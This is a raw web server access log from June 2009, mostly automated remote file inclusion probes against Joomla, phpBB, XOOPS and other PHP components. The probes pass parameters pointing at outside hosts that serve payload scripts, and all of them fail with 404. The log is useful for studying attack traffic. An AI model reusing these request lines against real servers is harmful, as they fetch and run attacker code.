119.245.138.143 - - [24/Jun/2009:05:32:00 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
119.245.138.143 - - [24/Jun/2009:05:32:00 -0400] "GET /index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
119.245.138.143 - - [24/Jun/2009:05:32:01 -0400] "GET /logs/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
58.227.193.198 - - [24/Jun/2009:05:32:22 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
58.227.193.198 - - [24/Jun/2009:05:32:22 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.227.193.198 - - [24/Jun/2009:05:32:22 -0400] "GET /logs/error_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
58.227.193.198 - - [24/Jun/2009:05:32:27 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:32:30 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:32:34 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:33:01 -0400] "GET /logs/access_log.Q109051600%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:33:01 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:33:01 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:05:33:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.38.128.43 - - [24/Jun/2009:05:33:35 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
205.234.108.246 - - [24/Jun/2009:05:33:38 -0400] "GET /logs/error_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:33:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0110614516D34400A8D0013+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.118.90.151 - - [24/Jun/2009:05:34:12 -0400] "GET /index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/bajocdm2.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
209.172.33.230 - - [24/Jun/2009:05:34:12 -0400] "GET /logs/error_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
119.245.138.143 - - [24/Jun/2009:05:35:39 -0400] "GET /logs/access_log.Q109060700/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
66.249.71.49 - - [24/Jun/2009:05:35:45 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0190604009839900DF6006G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.17.151 - - [24/Jun/2009:05:35:42 -0400] "GET /logs/error_log.Q109062300 HTTP/1.0" 200 2793028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.172.33.230 - - [24/Jun/2009:05:36:01 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:36:11 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.121.201.70 - - [24/Jun/2009:05:36:15 -0400] "GET /logs/access_log.Q109061200/send_reminders.php?includedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:36:23 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:37:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01105F4E1483A400D3F0012+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.30.100.97 - - [24/Jun/2009:05:37:57 -0400] "GET /logs/error_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
218.30.100.97 - - [24/Jun/2009:05:37:57 -0400] "GET /logs/access_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://ipr2.apg.kr/ipr/language/1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:37:59 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:37:59 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:05:38:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.232.143.149 - - [24/Jun/2009:05:38:37 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
66.232.143.149 - - [24/Jun/2009:05:38:38 -0400] "GET /index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
66.232.143.149 - - [24/Jun/2009:05:38:38 -0400] "GET /logs/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
38.108.180.22 - - [24/Jun/2009:05:38:39 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.108.180.22 - - [24/Jun/2009:05:38:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
118.101.3.94 - - [24/Jun/2009:05:39:22 -0400] "GET //administrator/components/com_moofaq/css/index2.php?file=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
118.101.3.94 - - [24/Jun/2009:05:39:23 -0400] "GET /logs/access_log.Q109061800%20%20//administrator/components/com_moofaq/css/index2.php?file=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:39:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106B461F7304001AC0025+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.101.3.94 - - [24/Jun/2009:05:39:40 -0400] "GET /logs/access_log.Q109061500%20%20//administrator/components/com_moofaq/css/index2.php?file=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:41:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B82479C228600541F071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.201.208.50 - - [24/Jun/2009:05:41:07 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dracocafe.pl/sklep//components/com_sef/1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:05:41:07 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dracocafe.pl/sklep//components/com_sef/1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:05:41:08 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dracocafe.pl/sklep//components/com_sef/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:05:41:17 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
91.121.137.51 - - [24/Jun/2009:05:41:17 -0400] "GET /logs/access_log.Q109060300//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
91.121.137.51 - - [24/Jun/2009:05:41:17 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
87.106.101.144 - - [24/Jun/2009:05:41:22 -0400] "GET /http://www.otavioceleste.com/images/idx? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
91.121.137.51 - - [24/Jun/2009:05:41:58 -0400] "GET /logs/error_log.Q109060300//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
66.249.71.49 - - [24/Jun/2009:05:42:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0190604009637900D56006G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.89.138 - - [24/Jun/2009:05:42:35 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.813"
88.191.89.138 - - [24/Jun/2009:05:42:35 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.813"
88.191.89.138 - - [24/Jun/2009:05:42:35 -0400] "GET /logs/access_log.Q109060300//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.813"
88.191.89.138 - - [24/Jun/2009:05:43:07 -0400] "GET /logs/error_log.Q109060300//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 267 "-" "libwww-perl/5.813"
66.249.71.49 - - [24/Jun/2009:05:43:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106D471313E400CED0018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.118.90.151 - - [24/Jun/2009:05:43:42 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/bajocdm2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.118.90.151 - - [24/Jun/2009:05:43:42 -0400] "GET /logs/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/bajocdm2.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
63.223.104.57 - - [24/Jun/2009:05:43:48 -0400] "GET /logs/error_log.Q109061400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
209.172.33.230 - - [24/Jun/2009:05:44:03 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:44:03 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:44:09 -0400] "GET /logs/access_log.Q109060300%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
203.130.6.10 - - [24/Jun/2009:05:44:35 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.130.6.10 - - [24/Jun/2009:05:44:35 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.71.49 - - [24/Jun/2009:05:44:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905D480153C9004B3006E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.57 - - [24/Jun/2009:05:45:46 -0400] "GET /images/over-store_gauze_section.jpg HTTP/1.1" 200 8076 "-" "Googlebot-Image/1.0"
110.45.144.33 - - [24/Jun/2009:05:45:48 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
87.118.90.151 - - [24/Jun/2009:05:45:48 -0400] "GET /logs/access_log.Q109060700/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/bajocdm2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
110.45.144.33 - - [24/Jun/2009:05:45:49 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.144.33 - - [24/Jun/2009:05:45:49 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
80.210.29.135 - - [24/Jun/2009:05:46:30 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
80.210.29.135 - - [24/Jun/2009:05:46:30 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.210.29.135 - - [24/Jun/2009:05:46:30 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:46:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011062411C23E40090F0021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.210.29.135 - - [24/Jun/2009:05:46:37 -0400] "GET /logs/access_log.Q109051600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:05:46:53 -0400] "GET /logs/error_log.Q109060300%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
63.223.104.57 - - [24/Jun/2009:05:47:21 -0400] "GET /logs/access_log.Q109051600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810"
66.249.71.49 - - [24/Jun/2009:05:47:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B82479CC2C600531F071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.49 - - [24/Jun/2009:05:48:34 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011062411CC3640090F0021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
117.74.99.225 - - [24/Jun/2009:05:49:48 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
117.74.99.225 - - [24/Jun/2009:05:49:48 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.74.99.225 - - [24/Jun/2009:05:49:48 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:05:49:59 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dracocafe.pl/sklep//components/com_sef/1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:50:06 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905F4003F309000F1006F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.201.208.50 - - [24/Jun/2009:05:50:14 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dracocafe.pl/sklep//components/com_sef/1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.6.17.151 - - [24/Jun/2009:05:50:14 -0400] "GET /logs/access_log.Q109053000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
117.74.99.225 - - [24/Jun/2009:05:51:21 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:51:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8BD27200450F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.232.143.149 - - [24/Jun/2009:05:51:39 -0400] "GET /logs/access_log.Q109060700/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.144.33 - - [24/Jun/2009:05:51:42 -0400] "GET /logs/access_log.Q109051300//////index2.php?page=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
110.45.144.33 - - [24/Jun/2009:05:51:43 -0400] "GET //////index2.php?page=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.144.33 - - [24/Jun/2009:05:51:43 -0400] "GET /logs//////index2.php?page=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
124.138.156.3 - - [24/Jun/2009:05:52:20 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:52:20 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:52:20 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:52:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01105F4E14F38400D8F0012+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.138.156.3 - - [24/Jun/2009:05:52:47 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:52:47 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:52:47 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:05:52:53 -0400] "GET /logs/error_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
80.210.29.135 - - [24/Jun/2009:05:53:10 -0400] "GET /logs/access_log.Q109051600%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
80.210.29.135 - - [24/Jun/2009:05:53:39 -0400] "GET /logs/access_log.Q109061200%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:53:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106B461ED3F40019C0025+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.144.33 - - [24/Jun/2009:05:54:13 -0400] "GET /logs/access_log.Q109051900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
116.121.201.70 - - [24/Jun/2009:05:54:20 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
116.121.201.70 - - [24/Jun/2009:05:54:20 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.121.201.70 - - [24/Jun/2009:05:54:20 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:05:55:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905F40044379000C1006F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.201.208.50 - - [24/Jun/2009:05:56:12 -0400] "GET /logs/access_log.Q109051700/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dracocafe.pl/sklep//components/com_sef/1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:05:56:53 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011062411CE3F40093F0021+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.121.201.70 - - [24/Jun/2009:05:57:22 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:05:57:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.38.128.43 - - [24/Jun/2009:05:57:54 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:57:54 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:57:54 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:05:57:55 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.neo-little.webs.com/files/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:05:58:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01105F4E1543F400D5F0012+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.121.201.70 - - [24/Jun/2009:05:58:12 -0400] "GET /logs/access_log.Q109052500%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:05:59:30 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106D4713937400C2D0018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.200.195.130 - - [24/Jun/2009:05:59:54 -0400] "GET /logs/access_log.Q109052100%20%20/help.php?css_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
